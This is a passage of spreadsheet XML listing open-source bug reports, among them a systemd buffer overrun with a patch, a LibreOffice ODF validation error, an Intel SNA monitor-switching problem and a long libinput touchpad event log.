When editing existing strings or editing other translators suggestions the field opens with a lot of spaces and line breaks before and after the string.
This is very annoing.
If not corrected the string ends up 'dirty' with these blanks.
The consequense will be a lot of dirty strings.</t>
  </si>
  <si>
    <t>LIBREOFFICE-45450</t>
  </si>
  <si>
    <t>Calc ODF export: invalid style:vertical-justify/css3t:text-justify written in ODF 1.1/1.2</t>
  </si>
  <si>
    <t>Created attachment 56396
validated file
Writer document not passed validation on http://odf-validator.rhcloud.com/
error is:
temp-22.odt/Object 1/styles.xml[243729]: Error: unexpected attribute style:vertical-justify
LibO 3.6.0 master a1275f8-9eed775-f061262</t>
  </si>
  <si>
    <t>SYSTEMD-69887</t>
  </si>
  <si>
    <t>Buffer overrun when enumerating files</t>
  </si>
  <si>
    <t>Created attachment 86736
Patch that fixes the bug
There is a buffer overrun in src/shared/util.c:get_files_in_directory() when the number of files in the directory to be enumerated exceeds 15.
It does not account for the sentinel NULL when resizing the buffer and the NULL is re-added after each new item causing an overrun whenever the buffer is about to be realloc()ed.
This can cause e.g. gnome-shell to crash and display a blank screen in gdm when the user has more than 15 files in /run/systemd/sessions/. I've seen user reports of this and verified it experimentally with valgrind.
I'm attaching a patch that fixes the issue by ensuring there's enough space for the sentinel.</t>
  </si>
  <si>
    <t>XORG-4554</t>
  </si>
  <si>
    <t>driver/xf86-video-sunffb misses configure check for drm</t>
  </si>
  <si>
    <t>I got a compile error 
 gcc -DHAVE_CONFIG_H -I. -I. -I.. -DIN_MODULE -DXFree86Module 
-I/usr/X11R7/include/xorg -I/usr/X11R7/include -g -O2 -MT ffb_accel.lo -MD -MP 
-MF .deps/ffb_accel.Tpo -c ffb_accel.c  -fPIC -DPIC -o .libs/ffb_accel.o 
In file included from ffb.h:44 
                 from ffb_accel.c:41: 
/usr/X11R7/include/xorg/xf86drm.h:39:17: error: drm.h: No such file or 
directory 
I expect the configure script to complain about missing libraries and not get 
a compile fault that I have to try to interpret.</t>
  </si>
  <si>
    <t>zander</t>
  </si>
  <si>
    <t>DRI-51405</t>
  </si>
  <si>
    <t>[GT2+ SNA] Problems when switching external monitor on/off</t>
  </si>
  <si>
    <t>Created attachment 63431
xrandr --verbose (w/o sna external connected and enabled)
I'm working with a Lenovo Thinkpad T520 with a SandyBridge GPU. When xf86-video-intel is compiled with sna enabled I run into problems when switching off the external monitor (via xrandr) that is connected via DVI: Either the laptop screen (LVDS1) turns completely black or is dimmed down so much as to appear being off. Also it seems that internally nothing is changed because the windows and taskbars are not visible. Switching the external monitor back on (via xrandr) brings on the external monitor fine but does not change anything for LVDS1.
The xrandr-calls:
to turn things off:
xrandr --output HDMI3 --off xrandr --output LVDS1 --auto
to turn things on:
xrandr --output HDMI3 --auto --pos 0x0 --primary --output LVDS1 --auto --pos 1600x30
When sna is disabled everything works fine.
chipset: 
+ as per xorg: Integrated Graphics Chipset: Intel(R) Sandybridge Mobile (GT2+)
+ as per lspci: Intel Corporation 2nd Generation Core Processor Family Integrated Graphics Controller (rev 09)
versions:
+ mesa: 8.0.3
+ xf86-video-intel: 2.19.0
+ xorg-server: 1.12.2
+ libdrm: 2.4.33
+ kernel: 3.2.12-gentoo
Linux distribution: Gentoo</t>
  </si>
  <si>
    <t>gentoo</t>
  </si>
  <si>
    <t>PYXDG-54747</t>
  </si>
  <si>
    <t>empty Utilities menu appears in Applications menu</t>
  </si>
  <si>
    <t>Created attachment 66939
Fix empty menu removal
Since pyxdg &gt; 19 (not sure when exactly) an empty Utilities menu appeared in my openbox applications menu which is generated using pyxdg.
The Utilities menu originates from /usr/share/applnk/Utilities but other old empty dirs under applnk (Applications Edutainment System Toys) weren't shown.
I eventually discovered this was caused by removing entries from a list currently being iterated over which the python docs say is unsafe and that you need to make a copy.</t>
  </si>
  <si>
    <t>TELEPATHY-33119</t>
  </si>
  <si>
    <t>Bind Connection.HasImmortalHandles</t>
  </si>
  <si>
    <t>CAIRO-102452</t>
  </si>
  <si>
    <t>Minor typo in autogen.sh intall instead of install</t>
  </si>
  <si>
    <t>Patch following</t>
  </si>
  <si>
    <t>PULSEAUDIO-94839</t>
  </si>
  <si>
    <t>[l10n] Updated Italian translation</t>
  </si>
  <si>
    <t>Created attachment 122757
Updated Italian translation (patch)
Please find attached an updated Italian translation for pulseaudio.</t>
  </si>
  <si>
    <t>milo</t>
  </si>
  <si>
    <t>WAYLAND-87197</t>
  </si>
  <si>
    <t>libinput does not filter proximity events</t>
  </si>
  <si>
    <t>Using GNOME-Shell in Fedora 21 I've noticed that my trackpad wiggled a bit and by observing when it did so I realized that the touchpad was detecting my finger even before it touched the surface.
Below is a log of the events recorded in the touchpad without touching it a single time just approaching the finger.
[500][aruiz@kerrigan ~]$ sudo evemu-record 
Available devices:
/dev/input/event0:	Lid Switch
/dev/input/event1:	Sleep Button
/dev/input/event2:	Power Button
/dev/input/event3:	AT Translated Set 2 keyboard
/dev/input/event4:	SynPS/2 Synaptics TouchPad
/dev/input/event5:	Video Bus
/dev/input/event6:	TPPS/2 IBM TrackPoint
/dev/input/event7:	ThinkPad Extra Buttons
/dev/input/event8:	HDA Intel PCH Mic
/dev/input/event9:	HDA Intel PCH Dock Mic
/dev/input/event10:	HDA Intel PCH Headphone
/dev/input/event11:	HDA Intel PCH Dock Headphone
/dev/input/event12:	HDA Intel PCH HDMI/DPpcm=3
/dev/input/event13:	HDA Intel PCH HDMI/DPpcm=7
/dev/input/event14:	HDA Intel PCH HDMI/DPpcm=8
/dev/input/event15:	Integrated Camera
Select the device event number [0-15]: 4
# EVEMU 1.2
# Input device name: SynPS/2 Synaptics TouchPad
# Input device ID: bus 0x11 vendor 0x02 product 0x07 version 0x1b1
# Supported events:
#   Event type 0 (EV_SYN)
#     Event code 0 (SYN_REPORT)
#     Event code 1 (SYN_CONFIG)
#     Event code 2 (SYN_MT_REPORT)
#     Event code 3 (SYN_DROPPED)
#     Event code 4 ((null))
#     Event code 5 ((null))
#     Event code 6 ((null))
#     Event code 7 ((null))
#     Event code 8 ((null))
#     Event code 9 ((null))
#     Event code 10 ((null))
#     Event code 11 ((null))
#     Event code 12 ((null))
#     Event code 13 ((null))
#     Event code 14 ((null))
#   Event type 1 (EV_KEY)
#     Event code 272 (BTN_LEFT)
#     Event code 273 (BTN_RIGHT)
#     Event code 325 (BTN_TOOL_FINGER)
#     Event code 330 (BTN_TOUCH)
#     Event code 333 (BTN_TOOL_DOUBLETAP)
#     Event code 334 (BTN_TOOL_TRIPLETAP)
#   Event type 3 (EV_ABS)
#     Event code 0 (ABS_X)
#       Value   2253
#       Min     1472
#       Max     5470
#       Fuzz       0
#       Flat       0
#       Resolution 60
#     Event code 1 (ABS_Y)
#       Value   2611
#       Min     1408
#       Max     4498
#       Fuzz       0
#       Flat       0
#       Resolution 85
#     Event code 24 (ABS_PRESSURE)
#       Value      0
#       Min        0
#       Max      255
#       Fuzz       0
#       Flat       0
#       Resolution 0
#     Event code 28 (ABS_TOOL_WIDTH)
#       Value      0
#       Min        0
#       Max       15
#       Fuzz       0
#       Flat       0
#       Resolution 0
#     Event code 47 (ABS_MT_SLOT)
#       Value      0
#       Min        0
#       Max        1
#       Fuzz       0
#       Flat       0
#       Resolution 0
#     Event code 53 (ABS_MT_POSITION_X)
#       Value      0
#       Min     1472
#       Max     5470
#       Fuzz       0
#       Flat       0
#       Resolution 60
#     Event code 54 (ABS_MT_POSITION_Y)
#       Value      0
#       Min     1408
#       Max     4498
#       Fuzz       0
#       Flat       0
#       Resolution 85
#     Event code 57 (ABS_MT_TRACKING_ID)
#       Value      0
#       Min        0
#       Max    65535
#       Fuzz       0
#       Flat       0
#       Resolution 0
# Properties:
#   Property  type 0 (INPUT_PROP_POINTER)
#   Property  type 3 (INPUT_PROP_SEMI_MT)
N: SynPS/2 Synaptics TouchPad
I: 0011 0002 0007 01b1
P: 09 00 00 00 00 00 00 00
B: 00 0b 00 00 00 00 00 00 00
B: 01 00 00 00 00 00 00 00 00
B: 01 00 00 00 00 00 00 00 00
B: 01 00 00 00 00 00 00 00 00
B: 01 00 00 00 00 00 00 00 00
B: 01 00 00 03 00 00 00 00 00
B: 01 20 64 00 00 00 00 00 00
B: 01 00 00 00 00 00 00 00 00
B: 01 00 00 00 00 00 00 00 00
B: 01 00 00 00 00 00 00 00 00
B: 01 00 00 00 00 00 00 00 00
B: 01 00 00 00 00 00 00 00 00
B: 01 00 00 00 00 00 00 00 00
B: 02 00 00 00 00 00 00 00 00
B: 03 03 00 00 11 00 80 60 02
B: 04 00 00 00 00 00 00 00 00
B: 05 00 00 00 00 00 00 00 00
B: 11 00 00 00 00 00 00 00 00
B: 12 00 00 00 00 00 00 00 00
B: 14 00 00 00 00 00 00 00 00
B: 15 00 00 00 00 00 00 00 00
B: 15 00 00 00 00 00 00 00 00
A: 00 1472 5470 0 0 60
A: 01 1408 4498 0 0 85
A: 18 0 255 0 0 0
A: 1c 0 15 0 0 0
A: 2f 0 1 0 0 0
A: 35 1472 5470 0 0 60
A: 36 1408 4498 0 0 85
A: 39 0 65535 0 0 0
################################
#      Waiting for events      #
################################
E: 0.000000 0003 0039 30939	# EV_ABS / ABS_MT_TRACKING_ID   30939
E: 0.000000 0003 0035 4423	# EV_ABS / ABS_MT_POSITION_X    4423
E: 0.000000 0003 0036 1972	# EV_ABS / ABS_MT_POSITION_Y    1972
E: 0.000000 0003 0000 4423	# EV_ABS / ABS_X                4423
E: 0.000000 0003 0001 1972	# EV_ABS / ABS_Y                1972
E: 0.000000 0003 0018 0009	# EV_ABS / ABS_PRESSURE         9
E: 0.000000 0003 001c 0006	# EV_ABS / ABS_TOOL_WIDTH       6
E: 0.000000 0001 0145 0001	# EV_KEY / BTN_TOOL_FINGER      1
E: 0.000000 0000 0000 0000	# ------------ SYN_REPORT (0) ----------
E: 0.012326 0003 0035 4426	# EV_ABS / ABS_MT_POSITION_X    4426
E: 0.012326 0003 0036 1970	# EV_ABS / ABS_MT_POSITION_Y    1970
E: 0.012326 0003 0000 4426	# EV_ABS / ABS_X                4426
E: 0.012326 0003 0001 1970	# EV_ABS / ABS_Y                1970
E: 0.012326 0003 001c 0005	# EV_ABS / ABS_TOOL_WIDTH       5
E: 0.012326 0000 0000 0000	# ------------ SYN_REPORT (0) ----------
E: 0.024655 0003 0036 1986	# EV_ABS / ABS_MT_POSITION_Y    1986
E: 0.024655 0003 0001 1986	# EV_ABS / ABS_Y                1986
E: 0.024655 0000 0000 0000	# ------------ SYN_REPORT (0) ----------
E: 0.035978 0003 001c 0006	# EV_ABS / ABS_TOOL_WIDTH       6
E: 0.035978 0000 0000 0000	# ------------ SYN_REPORT (0) ----------
E: 0.048322 0003 0035 4427	# EV_ABS / ABS_MT_POSITION_X    4427
E: 0.048322 0003 0036 1980	# EV_ABS / ABS_MT_POSITION_Y    1980
E: 0.048322 0003 0000 4427	# EV_ABS / ABS_X                4427
E: 0.048322 0003 0001 1980	# EV_ABS / ABS_Y                1980
E: 0.048322 0003 001c 0005	# EV_ABS / ABS_TOOL_WIDTH       5
E: 0.048322 0000 0000 0000	# ------------ SYN_REPORT (0) ----------
E: 0.072945 0003 0035 4443	# EV_ABS / ABS_MT_POSITION_X    4443
E: 0.072945 0003 0036 1956	# EV_ABS / ABS_MT_POSITION_Y    1956
E: 0.072945 0003 0000 4443	# EV_ABS / ABS_X                4443
E: 0.072945 0003 0001 1956	# EV_ABS / ABS_Y                1956
E: 0.072945 0003 001c 0006	# EV_ABS / ABS_TOOL_WIDTH       6
E: 0.072945 0000 0000 0000	# ------------ SYN_REPORT (0) ----------
E: 0.085237 0003 0035 4442	# EV_ABS / ABS_MT_POSITION_X    4442
E: 0.085237 0003 0036 1986	# EV_ABS / ABS_MT_POSITION_Y    1986
E: 0.085237 0003 0000 4442	# EV_ABS / ABS_X                4442
E: 0.085237 0003 0001 1986	# EV_ABS / ABS_Y                1986
E: 0.085237 0000 0000 0000	# ------------ SYN_REPORT (0) ----------
E: 0.097518 0003 001c 0005	# EV_ABS / ABS_TOOL_WIDTH       5
E: 0.097518 0000 0000 0000	# ------------ SYN_REPORT (0) ----------
E: 0.109814 0003 0035 4426	# EV_ABS / ABS_MT_POSITION_X    4426
E: 0.109814 0003 0036 1970	# EV_ABS / ABS_MT_POSITION_Y    1970
E: 0.109814 0003 0000 4426	# EV_ABS / ABS_X                4426
E: 0.109814 0003 0001 1970	# EV_ABS / ABS_Y                1970
E: 0.109814 0000 0000 0000	# ------------ SYN_REPORT (0) ----------
E: 0.146700 0003 001c 0006	# EV_ABS / ABS_TOOL_WIDTH       6
E: 0.146700 0000 0000 0000	# ------------ SYN_REPORT (0) ----------
E: 0.159001 0003 0036 1986	# EV_ABS / ABS_MT_POSITION_Y    1986
E: 0.159001 0003 0001 1986	# EV_ABS / ABS_Y                1986
E: 0.159001 0003 001c 0007	# EV_ABS / ABS_TOOL_WIDTH       7
E: 0.159001 0000 0000 0000	# ------------ SYN_REPORT (0) ----------
E: 0.171293 0003 0035 4427	# EV_ABS / ABS_MT_POSITION_X    4427
E: 0.171293 0003 0036 1996	# EV_ABS / ABS_MT_POSITION_Y    1996
E: 0.171293 0003 0000 4427	# EV_ABS / ABS_X                4427
E: 0.171293 0003 0001 1996	# EV_ABS / ABS_Y                1996
E: 0.171293 0003 001c 0005	# EV_ABS / ABS_TOOL_WIDTH       5
E: 0.171293 0000 0000 0000	# ------------ SYN_REPORT (0) ----------
E: 0.183527 0003 0035 4426	# EV_ABS / ABS_MT_POSITION_X    4426
E: 0.183527 0003 0036 2006	# EV_ABS / ABS_MT_POSITION_Y    2006
E: 0.183527 0003 0000 4426	# EV_ABS / ABS_X                4426
E: 0.183527 0003 0001 2006	# EV_ABS / ABS_Y                2006
E: 0.183527 0000 0000 0000	# ------------ SYN_REPORT (0) ----------
E: 0.196007 0003 0035 4427	# EV_ABS / ABS_MT_POSITION_X    4427
E: 0.196007 0003 0036 1980	# EV_ABS / ABS_MT_POSITION_Y    1980
E: 0.196007 0003 0000 4427	# EV_ABS / ABS_X                4427
E: 0.196007 0003 0001 1980	# EV_ABS / ABS_Y                1980
E: 0.196007 0003 001c 0006	# EV_ABS / ABS_TOOL_WIDTH       6
E: 0.196007 0000 0000 0000	# ------------ SYN_REPORT (0) ----------
E: 0.208364 0003 0035 4426	# EV_ABS / ABS_MT_POSITION_X    4426
E: 0.208364 0003 0036 2006	# EV_ABS / ABS_MT_POSITION_Y    2006
E: 0.208364 0003 0000 4426	# EV_ABS / ABS_X                4426
E: 0.208364 0003 0001 2006	# EV_ABS / ABS_Y                2006
E: 0.208364 0000 0000 0000	# ------------ SYN_REPORT (0) ----------
E: 0.220623 0003 0035 4417	# EV_ABS / ABS_MT_POSITION_X    4417
E: 0.220623 0003 0036 1995	# EV_ABS / ABS_MT_POSITION_Y    1995
E: 0.220623 0003 0000 4417	# EV_ABS / ABS_X                4417
E: 0.220623 0003 0001 1995	# EV_ABS / ABS_Y                1995
E: 0.220623 0000 0000 0000	# ------------ SYN_REPORT (0) ----------
E: 0.232887 0003 0035 4427	# EV_ABS / ABS_MT_POSITION_X    4427
E: 0.232887 0003 0036 1996	# EV_ABS / ABS_MT_POSITION_Y    1996
E: 0.232887 0003 0000 4427	# EV_ABS / ABS_X                4427
E: 0.232887 0003 0001 1996	# EV_ABS / ABS_Y                1996
E: 0.232887 0000 0000 0000	# ------------ SYN_REPORT (0) ----------
E: 0.245173 0003 0036 1992	# EV_ABS / ABS_MT_POSITION_Y    1992
E: 0.245173 0003 0001 1992	# EV_ABS / ABS_Y                1992
E: 0.245173 0003 001c 0005	# EV_ABS / ABS_TOOL_WIDTH       5
E: 0.245173 0000 0000 0000	# ------------ SYN_REPORT (0) ----------
E: 0.268692 0003 0035 4426	# EV_ABS / ABS_MT_POSITION_X    4426
E: 0.268692 0003 0036 1986	# EV_ABS / ABS_MT_POSITION_Y    1986
E: 0.268692 0003 0000 4426	# EV_ABS / ABS_X                4426
E: 0.268692 0003 0001 1986	# EV_ABS / ABS_Y                1986
E: 0.268692 0003 001c 0006	# EV_ABS / ABS_TOOL_WIDTH       6
E: 0.268692 0000 0000 0000	# ------------ SYN_REPORT (0) ----------
E: 0.280994 0003 0035 4442	# EV_ABS / ABS_MT_POSITION_X    4442
E: 0.280994 0003 0000 4442	# EV_ABS / ABS_X                4442
E: 0.280994 0003 0018 0008	# EV_ABS / ABS_PRESSURE         8
E: 0.280994 0003 001c 0007	# EV_ABS / ABS_TOOL_WIDTH       7
E: 0.280994 0000 0000 0000	# ------------ SYN_REPORT (0) ----------
E: 0.305824 0003 0018 0006	# EV_ABS / ABS_PRESSURE         6
E: 0.305824 0003 001c 0006	# EV_ABS / ABS_TOOL_WIDTH       6
E: 0.305824 0000 0000 0000	# ------------ SYN_REPORT (0) ----------
E: 0.318151 0003 0035 4434	# EV_ABS / ABS_MT_POSITION_X    4434
E: 0.318151 0003 0036 1994	# EV_ABS / ABS_MT_POSITION_Y    1994
E: 0.318151 0003 0000 4434	# EV_ABS / ABS_X                4434
E: 0.318151 0003 0001 1994	# EV_ABS / ABS_Y                1994
E: 0.318151 0003 001c 0007	# EV_ABS / ABS_TOOL_WIDTH       7
E: 0.318151 0000 0000 0000	# ------------ SYN_REPORT (0) ----------
E: 0.330414 0003 0039 -001	# EV_ABS / ABS_MT_TRACKING_ID   -1
E: 0.330414 0003 0018 0003	# EV_ABS / ABS_PRESSURE         3
E: 0.330414 0003 001c 0000	# EV_ABS / ABS_TOOL_WIDTH       0
E: 0.330414 0001 0145 0000	# EV_KEY / BTN_TOOL_FINGER      0
E: 0.330414 0000 0000 0000	# ------------ SYN_REPORT (0) ----------
E: 0.465058 0003 0018 0002	# EV_ABS / ABS_PRESSURE         2
E: 0.465058 0000 0000 0000	# ------------ SYN_REPORT (0) ----------
E: 0.477427 0003 0018 0001	# EV_ABS / ABS_PRESSURE         1
E: 0.477427 0000 0000 0000	# ------------ SYN_REPORT (0) ----------
E: 0.538851 0003 0018 0000	# EV_ABS / ABS_PRESSURE         0
E: 0.538851 0000 0000 0000	# ------------ SYN_REPORT (0) ----------
E: 1.077800 0003 0018 0001	# EV_ABS / ABS_PRESSURE         1
E: 1.077800 0000 0000 0000	# ------------ SYN_REPORT (0) ----------
E: 1.163593 0003 0018 0002	# EV_ABS / ABS_PRESSURE         2
E: 1.163593 0000 0000 0000	# ------------ SYN_REPORT (0) ----------
E: 2.009335 0003 0039 30940	# EV_ABS / ABS_MT_TRACKING_ID   30940
E: 2.009335 0003 0035 4442	# EV_ABS / ABS_MT_POSITION_X    4442
E: 2.009335 0003 0036 2006	# EV_ABS / ABS_MT_POSITION_Y    2006
E: 2.009335 0003 0000 4442	# EV_ABS / ABS_X                4442
E: 2.009335 0003 0001 2006	# EV_ABS / ABS_Y                2006
E: 2.009335 0003 0018 0008	# EV_ABS / ABS_PRESSURE         8
E: 2.009335 0003 001c 0006	# EV_ABS / ABS_TOOL_WIDTH       6
E: 2.009335 0001 0145 0001	# EV_KEY / BTN_TOOL_FINGER      1
E: 2.009335 0000 0000 0000	# ------------ SYN_REPORT (0) ----------
E: 2.021606 0003 0035 4431	# EV_ABS / ABS_MT_POSITION_X    4431
E: 2.021606 0003 0036 1980	# EV_ABS / ABS_MT_POSITION_Y    1980
E: 2.021606 0003 0000 4431	# EV_ABS / ABS_X                4431
E: 2.021606 0003 0001 1980	# EV_ABS / ABS_Y                1980
E: 2.021606 0003 0018 0009	# EV_ABS / ABS_PRESSURE         9
E: 2.021606 0003 001c 0005	# EV_ABS / ABS_TOOL_WIDTH       5
E: 2.021606 0000 0000 0000	# ------------ SYN_REPORT (0) ----------
E: 2.032956 0003 0035 4443	# EV_ABS / ABS_MT_POSITION_X    4443
E: 2.032956 0003 0036 1976	# EV_ABS / ABS_MT_POSITION_Y    1976
E: 2.032956 0003 0000 4443	# EV_ABS / ABS_X                4443
E: 2.032956 0003 0001 1976	# EV_ABS / ABS_Y                1976
E: 2.032956 0003 001c 0006	# EV_ABS / ABS_TOOL_WIDTH       6
E: 2.032956 0000 0000 0000	# ------------ SYN_REPORT (0) ----------
E: 2.045211 0003 0035 4431	# EV_ABS / ABS_MT_POSITION_X    4431
E: 2.045211 0003 0036 1992	# EV_ABS / ABS_MT_POSITION_Y    1992
E: 2.045211 0003 0000 4431	# EV_ABS / ABS_X                4431
E: 2.045211 0003 0001 1992	# EV_ABS / ABS_Y                1992
E: 2.045211 0000 0000 0000	# ------------ SYN_REPORT (0) ----------
E: 2.057536 0003 0036 1980	# EV_ABS / ABS_MT_POSITION_Y    1980
E: 2.057536 0003 0001 1980	# EV_ABS / ABS_Y                1980
E: 2.057536 0003 001c 0005	# EV_ABS / ABS_TOOL_WIDTH       5
E: 2.057536 0000 0000 0000	# ------------ SYN_REPORT (0) ----------
E: 2.069805 0003 0035 4426	# EV_ABS / ABS_MT_POSITION_X    4426
E: 2.069805 0003 0036 2050	# EV_ABS / ABS_MT_POSITION_Y    2050
E: 2.069805 0003 0000 4426	# EV_ABS / ABS_X                4426
E: 2.069805 0003 0001 2050	# EV_ABS / ABS_Y                2050
E: 2.069805 0003 001c 0006	# EV_ABS / ABS_TOOL_WIDTH       6
E: 2.069805 0000 0000 0000	# ------------ SYN_REPORT (0) ----------
E: 2.082063 0003 0036 2042	# EV_ABS / ABS_MT_POSITION_Y    2042
E: 2.082063 0003 0001 2042	# EV_ABS / ABS_Y                2042
E: 2.082063 0003 001c 0005	# EV_ABS / ABS_TOOL_WIDTH       5
E: 2.082063 0000 0000 0000	# ------------ SYN_REPORT (0) ----------
E: 2.094352 0003 001c 0006	# EV_ABS / ABS_TOOL_WIDTH       6
E: 2.094352 0000 0000 0000	# ------------ SYN_REPORT (0) ----------
E: 2.106640 0003 0035 4442	# EV_ABS / ABS_MT_POSITION_X    4442
E: 2.106640 0003 0036 1986	# EV_ABS / ABS_MT_POSITION_Y    1986
E: 2.106640 0003 0000 4442	# EV_ABS / ABS_X                4442
E: 2.106640 0003 0001 1986	# EV_ABS / ABS_Y                1986
E: 2.106640 0000 0000 0000	# ------------ SYN_REPORT (0) ----------
E: 2.118989 0003 0035 4427	# EV_ABS / ABS_MT_POSITION_X    4427
E: 2.118989 0003 0036 1996	# EV_ABS / ABS_MT_POSITION_Y    1996
E: 2.118989 0003 0000 4427	# EV_ABS / ABS_X                4427
E: 2.118989 0003 0001 1996	# EV_ABS / ABS_Y                1996
E: 2.118989 0000 0000 0000	# ------------ SYN_REPORT (0) ----------
E: 2.131279 0003 0035 4442	# EV_ABS / ABS_MT_POSITION_X    4442
E: 2.131279 0003 0036 1986	# EV_ABS / ABS_MT_POSITION_Y    1986
E: 2.131279 0003 0000 4442	# EV_ABS / ABS_X                4442
E: 2.131279 0003 0001 1986	# EV_ABS / ABS_Y                1986
E: 2.131279 0003 001c 0005	# EV_ABS / ABS_TOOL_WIDTH       5
E: 2.131279 0000 0000 0000	# ------------ SYN_REPORT (0) ----------
E: 2.143569 0003 0035 4413	# EV_ABS / ABS_MT_POSITION_X    4413
E: 2.143569 0003 0036 1991	# EV_ABS / ABS_MT_POSITION_Y    1991
E: 2.143569 0003 0000 4413	# EV_ABS / ABS_X                4413
E: 2.143569 0003 0001 1991	# EV_ABS / ABS_Y                1991
E: 2.143569 0000 0000 0000	# ------------ SYN_REPORT (0) ----------
E: 2.180394 0003 0035 4422	# EV_ABS / ABS_MT_POSITION_X    4422
E: 2.180394 0003 0036 2034	# EV_ABS / ABS_MT_POSITION_Y    2034
E: 2.180394 0003 0000 4422	# EV_ABS / ABS_X                4422
E: 2.180394 0003 0001 2034	# EV_ABS / ABS_Y                2034
E: 2.180394 0003 0018 0007	# EV_ABS / ABS_PRESSURE         7
E: 2.180394 0003 001c 0006	# EV_ABS / ABS_TOOL_WIDTH       6
E: 2.180394 0000 0000 0000	# ------------ SYN_REPORT (0) ----------
E: 2.193259 0003 0035 4438	# EV_ABS / ABS_MT_POSITION_X    4438
E: 2.193259 0003 0036 2006	# EV_ABS / ABS_MT_POSITION_Y    2006
E: 2.193259 0003 0000 4438	# EV_ABS / ABS_X                4438
E: 2.193259 0003 0001 2006	# EV_ABS / ABS_Y                2006
E: 2.193259 0003 001c 0007	# EV_ABS / ABS_TOOL_WIDTH       7
E: 2.193259 0000 0000 0000	# ------------ SYN_REPORT (0) ----------
E: 2.205516 0003 0035 4410	# EV_ABS / ABS_MT_POSITION_X    4410
E: 2.205516 0003 0036 2050	# EV_ABS / ABS_MT_POSITION_Y    2050
E: 2.205516 0003 0000 4410	# EV_ABS / ABS_X                4410
E: 2.205516 0003 0001 2050	# EV_ABS / ABS_Y                2050
E: 2.205516 0003 0018 0005	# EV_ABS / ABS_PRESSURE         5
E: 2.205516 0003 001c 0006	# EV_ABS / ABS_TOOL_WIDTH       6
E: 2.205516 0000 0000 0000	# ------------ SYN_REPORT (0) ----------
E: 2.216774 0003 0035 4433	# EV_ABS / ABS_MT_POSITION_X    4433
E: 2.216774 0003 0036 2059	# EV_ABS / ABS_MT_POSITION_Y    2059
E: 2.216774 0003 0000 4433	# EV_ABS / ABS_X                4433
E: 2.216774 0003 0001 2059	# EV_ABS / ABS_Y                2059
E: 2.216774 0000 0000 0000	# ------------ SYN_REPORT (0) ----------
E: 2.229074 0003 0035 4426	# EV_ABS / ABS_MT_POSITION_X    4426
E: 2.229074 0003 0036 2034	# EV_ABS / ABS_MT_POSITION_Y    2034
E: 2.229074 0003 0000 4426	# EV_ABS / ABS_X                4426
E: 2.229074 0003 0001 2034	# EV_ABS / ABS_Y                2034
E: 2.229074 0003 001c 0008	# EV_ABS / ABS_TOOL_WIDTH       8
E: 2.229074 0000 0000 0000	# ------------ SYN_REPORT (0) ----------
E: 2.241366 0003 0035 4432	# EV_ABS / ABS_MT_POSITION_X    4432
E: 2.241366 0003 0036 2049	# EV_ABS / ABS_MT_POSITION_Y    2049
E: 2.241366 0003 0000 4432	# EV_ABS / ABS_X                4432
E: 2.241366 0003 0001 2049	# EV_ABS / ABS_Y                2049
E: 2.241366 0003 001c 0006	# EV_ABS / ABS_TOOL_WIDTH       6
E: 2.241366 0000 0000 0000	# ------------ SYN_REPORT (0) ----------
E: 2.253821 0003 0035 1798	# EV_ABS / ABS_MT_POSITION_X    1798
E: 2.253821 0003 0036 4338	# EV_ABS / ABS_MT_POSITION_Y    4338
E: 2.253821 0003 002f 0001	# EV_ABS / ABS_MT_SLOT          1
E: 2.253821 0003 0039 30941	# EV_ABS / ABS_MT_TRACKING_ID   30941
E: 2.253821 0003 0035 4432	# EV_ABS / ABS_MT_POSITION_X    4432
E: 2.253821 0003 0036 2049	# EV_ABS / ABS_MT_POSITION_Y    2049
E: 2.253821 0003 0018 0003	# EV_ABS / ABS_PRESSURE         3
E: 2.253821 0003 001c 0005	# EV_ABS / ABS_TOOL_WIDTH       5
E: 2.253821 0001 0145 0000	# EV_KEY / BTN_TOOL_FINGER      0
E: 2.253821 0001 014d 0001	# EV_KEY / BTN_TOOL_DOUBLETAP   1
E: 2.253821 0000 0000 0000	# ------------ SYN_REPORT (0) ----------
E: 2.277494 0003 002f 0000	# EV_ABS / ABS_MT_SLOT          0
E: 2.277494 0003 0039 -001	# EV_ABS / ABS_MT_TRACKING_ID   -1
E: 2.277494 0003 002f 0001	# EV_ABS / ABS_MT_SLOT          1
E: 2.277494 0003 0039 -001	# EV_ABS / ABS_MT_TRACKING_ID   -1
E: 2.277494 0003 001c 0000	# EV_ABS / ABS_TOOL_WIDTH       0
E: 2.277494 0001 014d 0000	# EV_KEY / BTN_TOOL_DOUBLETAP   0
E: 2.277494 0000 0000 0000	# ------------ SYN_REPORT (0) ----------
E: 2.375851 0003 0018 0002	# EV_ABS / ABS_PRESSURE         2
E: 2.375851 0000 0000 0000	# ------------ SYN_REPORT (0) ----------
E: 2.510973 0003 0018 0001	# EV_ABS / ABS_PRESSURE         1
E: 2.510973 0000 0000 0000	# ------------ SYN_REPORT (0) ----------
E: 2.633323 0003 0018 0002	# EV_ABS / ABS_PRESSURE         2
E: 2.633323 0000 0000 0000	# ------------ SYN_REPORT (0) ----------
E: 2.670352 0003 0018 0003	# EV_ABS / ABS_PRESSURE         3
E: 2.670352 0000 0000 0000	# ------------ SYN_REPORT (0) ----------
E: 2.694961 0003 0018 0005	# EV_ABS / ABS_PRESSURE         5
E: 2.694961 0000 0000 0000	# ------------ SYN_REPORT (0) ----------
E: 2.730693 0003 0018 0006	# EV_ABS / ABS_PRESSURE         6
E: 2.730693 0000 0000 0000	# ------------ SYN_REPORT (0) ----------
E: 2.767560 0003 0018 0005	# EV_ABS / ABS_PRESSURE         5
E: 2.767560 0000 0000 0000	# ------------ SYN_REPORT (0) ----------
E: 2.878600 0003 0018 0003	# EV_ABS / ABS_PRESSURE         3
E: 2.878600 0000 0000 0000	# ------------ SYN_REPORT (0) ----------
E: 2.903152 0003 0018 0001	# EV_ABS / ABS_PRESSURE         1
E: 2.903152 0000 0000 0000	# ------------ SYN_REPORT (0) ----------
E: 2.940144 0003 0018 0000	# EV_ABS / ABS_PRESSURE         0
E: 2.940144 0000 0000 0000	# ------------ SYN_REPORT (0) ----------
^C[501][aruiz@kerrigan ~]$</t>
  </si>
  <si>
    <t>aruiz</t>
  </si>
  <si>
    <t>LIBREOFFICE-46568</t>
  </si>
  <si>
    <t>VALGRIND corruption ( and sometimes coredump )</t>
  </si>
  <si>
    <t>discovered that clicking on entries in the 'Manage Names' dialog in calc was sometimes causing a coredump. Got the following stack trace
(gdb) where
#0  0x00007fbbf0ab3cc2 in SvLBoxEntry::HasChildrenOnDemand (this=0x0) at /media/FreeAgent-3/LibreOffice-onegit/core/solver/unxlngx6.pro/inc/svtools/svlbox.hxx:213
